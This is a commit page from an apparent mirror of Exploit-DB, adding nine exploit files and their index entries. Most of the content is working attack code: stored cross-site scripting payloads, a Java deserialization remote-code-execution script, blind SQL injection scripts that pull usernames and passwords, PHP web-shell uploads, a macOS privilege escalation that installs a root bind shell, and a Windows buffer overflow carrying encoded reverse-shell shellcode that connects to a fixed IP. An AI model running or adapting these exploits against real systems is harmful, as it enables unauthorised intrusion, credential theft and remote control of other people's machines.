bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-05-13

Browse source 
10 changes to exploits/shellcodes

LanSend 3.2 - Buffer Overflow (SEH)
MacOS 320.whatis Script - Privilege Escalation
Phase Botnet - Blind SQL Injection
Orchard Core RC1 - Persistent Cross-Site Scripting
ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection
CuteNews 2.1.2 - Authenticated Arbitrary File Upload
Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting
qdPM 9.1 - Arbitrary File Upload
TylerTech Eagle 2018.3.11 - Remote Code Execution
This commit is contained in:
Offensive Security 2020-05-13 05:01:48 +00:00
parent 7cb5d48647
commit f564ddfd17
11 changed files with 661 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

58
exploits/aspx/webapps/48456.txt Normal file
View file

@ -0,0 +1,58 @@
# Exploit Title: Orchard Core RC1 - Persistent Cross-Site Scripting
# Google Dork: "Orchardcms"
# Date: 2020-05-07
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Vendor Homepage: http://www.orchardcore.net/
# Software Link: https://github.com/OrchardCMS/OrchardCore
# Version: RC1
# Tested on: Windows
# CVE : N/A
### Vulnerability : Persistent Cross-Site Scripting
###Describe the bug
Persistent Cross-site scripting (Stored XSS) vulnerabilities in Orchard CMS - Orchard Core RC1 allow remote attackers to inject arbitrary web script or HTML
via create or edit blog content.
###To Reproduce
Steps to reproduce the behavior:
POST /Admin/Contents/ContentTypes/BlogPost/Create HTTP/1.1
-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="ListPart.ContainerId"
4s5x3fv3qpsh7rwzvy069ykbxn
-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="TitlePart.Title"
Test XSS
-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="AutoroutePart.Path"
-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="BlogPost.Subtitle.Text"
-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="MarkdownBodyPart.Source"
<script>alert(document.cookie)</script>
-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="submit.Publish"
submit.Publish
-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="__RequestVerificationToken"
xxx
-----------------------------31063090348194141451329743365--
###Reference:
https://github.com/OrchardCMS/OrchardCore/issues/5802
### History
=============
2020-03-23 Issue discovered
2020-03-27 Vendor contacted
2020-04-22 Vendor response and hotfix
2020-04-22 Vendor set patch milestone to rc2

24
exploits/java/webapps/48459.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting
# Date: 2020-04-16
# Exploit Author: Dylan Garnaud & Benoit Malaboeuf - Pentesters from Orange Cyberdefense France
# Vendor Homepage: https://www.cisco.com/c/en/us/products/cloud-systems-management/dna-center/index.html
# Version: Cisco DNA before 1.3.0.6 and 1.3.1.4
# Tested on: 1.3.0.2
# CVE : CVE-2019-15253
# Security advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190205-dnac-xss
## 1 - Network Hierarchy
- Vulnerable parameter: Floor Name.
- Payload: ```<script>alert('XSS')</script>```
- Details: There is no control or security mechanism on this field. Specials characters are not encoded or filtered.
- Privileges: It requires admin or customer account.
- Location: Design -> Network Hirearchy -> Building -> Floor -> Field: "Floor name" .
## 2 - User Management
- Vulnerable parameters: First Name, Last Name .
- Payload: ```<script>alert('XSS')</script>```
- Details: There is no control or security mechanism on this field. Specials characters are not encoded or filtered.
- Privileges: It requires admin account.
- Location: Settings -> Users -> User Management -> Fields: "First Name" or "Last Name".CVE-2020-11808

57
exploits/java/webapps/48462.py Executable file
View file

@ -0,0 +1,57 @@
# Exploit Title: TylerTech Eagle 2018.3.11 - Remote Code Execution
# Date: 2019-10-08
# Exploit Author: Anthony Cole
# Vendor Homepage: https://www.tylertech.com/products/eagle
# Version: 2018.3.11
# Tested on: Windows 2012
# CVE: N/A
# Category: webapps
#
# Eagle is a software written in Java by TylerTech. Version 2018.3.11 allows an unauthenticated attacker to cause the software to deserialize untrusted data that can result in remote code execution.
# /recorder/ServiceManager in TylerTech Eagle 2018.3.11 is vulnerable to remote code execution via deserialization of untrusted user input from an authenticated user. The executed code will run as the tomcat service that is running the application.
#
import sys, requests, zlib, argparse, urlparse, subprocess
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def run_command(command):
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
output = b''
for line in iter(p.stdout.readline, b''):
output += line
return output
def isurl(urlstr):
try:
urlparse.urlparse(urlstr)
return urlstr
except:
raise argparse.ArgumentTypeError("invalid url")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Java Deserialization Exlpoit')
parser.add_argument("--url", "-u", type=isurl, required=True, help="the url of the target.")
parser.add_argument("--cmd", "-c", required=True, help="the command to execute")
parser.add_argument("--ysoserial", "-y", required=True, help="the path to ysoserial.jar")
parser.add_argument("--proxy", "-p", type=isurl, required=False, help="ex: http://127.0.0.1:8080")
args = parser.parse_args()
url_parts = urlparse.urlparse(args.url)
target_url = "%s://%s" % (url_parts.scheme, url_parts.netloc)
proxies = {}
if(args.proxy != None):
proxy_parts = urlparse.urlparse(args.proxy)
proxies[proxy_parts.scheme] = "%s://%s" % (proxy_parts.scheme, proxy_parts.netloc)
cmd = args.cmd
serial_payload = run_command('java -jar %s CommonsCollections6 "%s"' % (args.ysoserial, args.cmd))
url = target_url + "/recorder/ServiceManager?service=tyler.empire.settings.SettingManager"
headers = {'Content-Type': 'application/octet-stream'}
payload = zlib.compress(serial_payload)
response = requests.post(url, data=payload, proxies=proxies, verify=False)

82
exploits/linux/webapps/48454.py Executable file
View file

@ -0,0 +1,82 @@
import requests
import time
import sys
wait_delay = 5 #Depending on connection delay and server speed, you may need to make this a larger number
KnockString = 'g=a&w=a&b=a&d=a&p=a&m=a' #lol no integrity verification
PostData = ""
def rc4_crypt(data , key):
S = list(range(256))
j = 0
out = []
for i in range(256):
j = (j + S[i] + ord( key[i % len(key)] )) % 256
S[i] , S[j] = S[j] , S[i]
i = j = 0
for char in data:
i = ( i + 1 ) % 256
j = ( j + S[i] ) % 256
S[i] , S[j] = S[j] , S[i]
out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
return ''.join(out)
def brute_length(url, id):
for i in range(0, 30):
Injection = "\"', (IF(LENGTH((SELECT value FROM settings WHERE id='%d')) = %d, SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, i, wait_delay)
ConnectUrl = url + '?i=' + Injection
start = time.time()
r = requests.post(ConnectUrl, data=PostData, headers='')
end = time.time()
if((end - start) >= wait_delay):
return i
return 0
def brute_char(url, position, id):
sys.stdout.write(" ")
sys.stdout.flush()
for i in range(32, 127):
Injection = "\"', (IF(SUBSTRING((SELECT value FROM settings WHERE id='%d'), %d, 1) = BINARY CHAR(%d), SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, position, i, wait_delay)
ConnectUrl = url + '?i=' + Injection
sys.stdout.write("\b%c" % chr(i))
sys.stdout.flush()
start = time.time()
r = requests.post(ConnectUrl, data=PostData, headers='')
end = time.time()
if((end - start) >= wait_delay):
break
def brute_panel(url):
global KnockString, PostData
PostData = 'aaaa' + rc4_crypt(KnockString, 'aaaa')
print"Username: ",;
sys.stdout.flush()
ulen = brute_length(url, 1)
for i in range(1, ulen+1):
brute_char(url, i, 1)
print"\nPassword: ",
sys.stdout.flush()
plen = brute_length(url, 2)
for i in range(1, plen+1):
brute_char(url, i, 2)
print""
if(len(sys.argv) >= 2):
brute_panel(sys.argv[1])
else:
print("enter panel gate url")

114
exploits/macos/local/48464.py Executable file
View file

@ -0,0 +1,114 @@
# Exploit Title: MacOS 320.whatis Script - Privilege Escalation
# Date: 2020-05-06
# Exploit Author: Csaba Fitzl
# Vendor Homepage: https://support.apple.com/en-us/HT210722
# Version: macOS < 10.15.1
# Tested on: macOS
# CVE : CVE-2019-8802
import sys
import os
man_file_content = """
.TH exploit 1 "August 16 2019" "Csaba Fitzl"
.SH NAME
exploit \- --> <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>Label</key><string>com.sample.Load</string><key>ProgramArguments</key><array> <string>/Applications/Scripts/sample.sh</string></array><key>RunAtLoad</key><true/></dict></plist><!--
"""
sh_quick_content = """
/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
"""
sh_reboot_content = """
python /Applications/Scripts/bind.py
"""
python_bind_content = """
#!/usr/bin/python2
import os
import pty
import socket
lport = 31337
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', lport))
s.listen(1)
(rem, addr) = s.accept()
os.dup2(rem.fileno(),0)
os.dup2(rem.fileno(),1)
os.dup2(rem.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
if __name__ == "__main__":
main()
"""
def create_man_file():
print("[i] Creating bogus man page: /usr/local/share/man/man1/<!--exploit.1")
f = open('/usr/local/share/man/man1/<!--exploit.1','w')
f.write(man_file_content)
f.close()
def create_symlink():
print("[i] Creating symlink in /usr/local/share/man/")
os.system('ln -s /Library/LaunchDaemons/com.sample.Load.plist /usr/local/share/man/whatis.tmp')
def create_scripts_dir():
print("[i] Creating /Applications/Scripts directory")
os.system('mkdir /Applications/Scripts')
def create_quick_scripts():
create_scripts_dir()
print("[i] Creating script file to be called by LaunchDaemon")
f = open('/Applications/Scripts/sample.sh','w')
f.write(sh_quick_content)
f.close()
os.system('chmod +x /Applications/Scripts/sample.sh')
def create_reboot_scripts():
create_scripts_dir()
print("[i] Creating script file to be called by LaunchDaemon")
f = open('/Applications/Scripts/sample.sh','w')
f.write(sh_reboot_content)
f.close()
os.system('chmod +x /Applications/Scripts/sample.sh')
print("[i] Creating python script for bind shell")
f = open('/Applications/Scripts/bind.py','w')
f.write(python_bind_content)
f.close()
def rename_man_pages():
for root, dirs, files in os.walk("/usr/local/share/man"):
for file in files:
if file[0] in "0123456789": #if filename begins with a number
old_file = os.path.join(root, file)
new_file = os.path.join(root, 'a' + file)
os.rename(old_file, new_file) #rename with adding a prefix
print("[i] Renaming: " + os.path.join(root, file))
def main():
if len(sys.argv) != 2 :
print "[-] Usage: python makewhatis_exploit.py [quick|reboot]"
sys.exit (1)
if sys.argv[1] == 'quick':
create_man_file()
create_symlink()
create_quick_scripts()
rename_man_pages()
print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] and then simulate a boot load with: \nsudo launchctl load com.sample.Load.plist"
elif sys.argv[1] == 'reboot':
create_man_file()
create_symlink()
create_reboot_scripts()
rename_man_pages()
print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] reboot macOS or run `sudo launchctl load com.sample.Load.plist` and connect to your root shell via:\nnc 127.1 31337"
else:
print "[-] Invalid arguments"
print "[-] Usage: python makewhatis_exploit.py [quick|reboot]"
if __name__== "__main__":
main()

46
exploits/php/webapps/48457.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Google Dork: N/A
# Date: 2020-05 -12
# Vendor Homepage: https://idangero.us/
# Software Link: https://github.com/idangerous/Plugins
# Version: <= 3.4
# Tested on: Ubuntu 18.04
# CVE: 2020-11530
Description:
A blind SQL injection vulnerability is present in Chop Slider 3
'/wp-content/plugins/chopslider/get_script/index.php':
$cs_result = $wpdb->get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . '
WHERE chopslider_id =' . $id);
PoC:
Blind SQL injection:
GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111 or
(SELECT sleep(10))=6868
SQLMap using:
sqlmap -u '
http://localhost/wp-content/plugins/chopslider/get_script/index.php?id=1111111111'
--level=5 --risk=3
sqlmap identified the following injection point(s) with a total of 17611
HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-3097 OR 2236=2236
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1111111111 OR SLEEP(5)
---
[08:55:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
I am looking forward to you accepting and approving my PoC.
Thankyou!
Vu Tien Hoa

117
exploits/php/webapps/48458.txt Normal file
View file

@ -0,0 +1,117 @@
# Exploit Title: CuteNews 2.1.2 - Authenticated Arbitrary File Upload
# Date: 2020-05-12
# Author: Vigov5 - SunCSR Team
# Vendor Homepage: https://cutephp.com
# Software Link: https://cutephp.com/click.php?cutenews_latest
# Version: v2.1.2
# Tested on: Ubuntu 18.04 / Kali Linux
Description:
------------------------------------------------------------------------
In the "Media Manager" area, Users with low privileges (Editor) can bypass
file upload restrictions, resulting in arbitrary command execution.
[PoC]
--------------------------------------------------------------------------------
# Step 1. Create shell $ exiftool -Comment='<?php echo "<pre>";
system($_GET['cmd']); ?>' shell.png;
# Step 2. Upload Shell (# Minimum editor privileges)
POST /CuteNews/index.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
Firefox/76.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------15868731501112834542363527723
Content-Length: 3775
Origin: [target]
DNT: 1
Connection: close
Referer: [target]/CuteNews/index.php
Cookie: CUTENEWS_SESSION=k4rgekaj68tr9ln8j0jlme7e7h
Upgrade-Insecure-Requests: 1
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="mod"
media
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="opt"
media
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="folder"
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="CKEditorFuncNum"
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="callback"
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="style"
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="faddm"
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="imgopts"
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="__signature_key"
7ffa4c94a150c20f0c1b51036f6e4597-editor
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="__signature_dsi"
48d87ded04d15407f258c57efa3216e8
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="upload_from_inet"
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="upload_file[]"; filename="shell.png"
Content-Type: image/png
[Content Image Here ! ]
-----------------------------15868731501112834542363527723
Content-Disposition: form-data; name="upload"
Upload file(s)
-----------------------------15868731501112834542363527723--
# Step 3. Change filename shell.jpg to shell.php
POST /CuteNews/index.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
Firefox/76.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: [target]
DNT: 1
Connection: close
Referer: http://[target]CuteNews/index.php
Cookie: CUTENEWS_SESSION=k4rgekaj68tr9ln8j0jlme7e7h
Upgrade-Insecure-Requests: 1
mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=ebdaf403dcda492fabe8f1d96399b16b-editor&__signature_dsi=27a9035f2b130dd1477ad2a37a5721da&pending=rename&ids%5B0%5D=shell.png&place%5B0%5D=shell.php
# Step 4. Execute the command with the path : http://
[target]/CuteNews/uploads/shell.php?cmd=id

81
exploits/php/webapps/48460.txt Normal file
View file

@ -0,0 +1,81 @@
# Exploit Title: qdPM 9.1 - Arbitrary File Upload
# Date: 2020-05-06
# Author: Besim ALTINOK
# Vendor Homepage: https://sourceforge.net/projects/qdpm/
# Software Link: https://sourceforge.net/projects/qdpm/
# Version: v9.1 (Maybe it affect other versions)
# Tested on: Xampp
# Credit: İsmail BOZKURT
# Remotely: Yes
Description
--------------------------------------------------------------------
When a normal user tries to update their profile, they can arbitrarily
upload files to the user_photo area. Because there are no file extension
controls. Additionally, the .htaccess file has some protection against
malicious .php file. But, the developer writes the wrong regex. So, the
Attacker can change extension as (.PHP) and run code on the server
.htaccess file content:
----------------------------------------------
# This is used to restrict access to this folder to anything other
# than images
# Prevents any script files from being accessed from the images folder
<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">
Order Deny,Allow
Deny from all
</FilesMatch>
Vulnerable File-1: actions.class.php
----------------------------------------------
Vulnerable function: processForm
---------------------------------------------
Vulnerable area:
---------------------------------------------
<?php
protected function processForm(sfWebRequest $request, sfForm $form)
{
$files = $request->getFiles();
$userPhoto = $files['users']['photo']['name'];
$form->bind($request->getParameter($form->getName()),
$request->getFiles($form->getName()));
if ($form->isValid())
{
$user = $this->getUser()->getAttribute('user');
$this->checkUser($form['email']->getValue(),$user->getId());
$form->setFieldValue('users_group_id',$user->getUsersGroupId());
$form->setFieldValue('active',$user->getActive());
$hasher = new PasswordHash(11, false);
if(isset($form['new_password']))
{
if(strlen($form['new_password']->getValue())>0)
{
$form->setFieldValue('password',
$hasher->HashPassword($form['new_password']->getValue()));
}
}
if(strlen($userPhoto)>0)
{
$userPhoto = rand(111111,999999) . '-' . $userPhoto;
$filename = sfConfig::get('sf_upload_dir') . '/users/' . $userPhoto;
move_uploaded_file($files['users']['photo']['tmp_name'], $filename);
$form->setFieldValue('photo', $userPhoto);
app::image_resize($filename,$filename);
}
else
{
$form->setFieldValue('photo', $form['photo_preview']->getValue());
}
?>

2
exploits/windows/local/48448.txt
View file

@ -2,7 +2,7 @@
# Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
# Date: 2020-05-06
# Vendor: https://www.solarwindsmsp.com/
# CVE: CVE-2020-1260
# CVE: CVE-2020-12608
# GitHub: https://github.com/jensregel/Advisories/tree/master/CVE-2020-12608
# CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H]
# CWE: 276

72
exploits/windows/local/48461.py Executable file
View file

@ -0,0 +1,72 @@
# Exploit Title: LanSend 3.2 - Buffer Overflow (SEH)
# Exploit Author: gurbanli
# Date: 2020-05-12
# Vulnerable Software: LanSend 3.2
# Vendor Homepage: https://lizardsystems.com
# Version: 3.2
# Software Link: https://lizardsystems.com/download/lansend_setup.exe
# Tested on: Windows 7 x86
f = file('payload.txt','w')
"""
PoC
1. Run exploit
2. Run Lansend and Click Add Computers Wizard
3. Choose import computers from file
4. Copy/paste payload.txt content into filename section
5. shellcode will be executed
"""
"""
msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
"""
shellcode = b""
shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf"
shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17"
shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b"
shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa"
shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89"
shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92"
shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c"
shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1"
shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9"
shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae"
shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01"
shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7"
shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b"
shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59"
shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a"
shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a"
shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6"
shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14"
shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98"
shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda"
shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32"
shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc"
shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75"
shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52"
shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b"
shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8"
shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a"
shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b"
shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f"
shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e"
shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c"
shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7"
"""
047FFF09 59 POP ECX
047FFF0A 59 POP ECX
047FFF0B 80C1 64 ADD CL,64
047FFF0E ^FFE1 JMP ECX
"""
jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1'
"""ppr 00417a47"""
payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x47\x7a\x41'
f.write(payload)
f.close()

9
files_exploits.csv
View file

@ -11070,6 +11070,8 @@ id,file,description,date,author,type,platform,port
48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,
48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,
48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,
48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42685,3 +42687,10 @@ id,file,description,date,author,type,platform,port
48451,exploits/php/webapps/48451.txt,"Victor CMS 1.0 - 'post' SQL Injection",2020-05-11,BKpatron,webapps,php,
48452,exploits/php/webapps/48452.txt,"Complaint Management System 1.0 - Authentication Bypass",2020-05-11,BKpatron,webapps,php,
48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple,
48454,exploits/linux/webapps/48454.py,"Phase Botnet - Blind SQL Injection",2014-12-23,MalwareTech,webapps,linux,
48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx,
48457,exploits/php/webapps/48457.txt,"ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection",2020-05-12,SunCSR,webapps,php,
48458,exploits/php/webapps/48458.txt,"CuteNews 2.1.2 - Authenticated Arbitrary File Upload",2020-05-12,"Nhat Ha",webapps,php,
48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",2020-05-12,"Dylan Garnaud",webapps,java,
48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",2020-05-12,Besim,webapps,php,
48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",2020-05-12,"Anthony Cole",webapps,java,

Can't render this file because it is too large.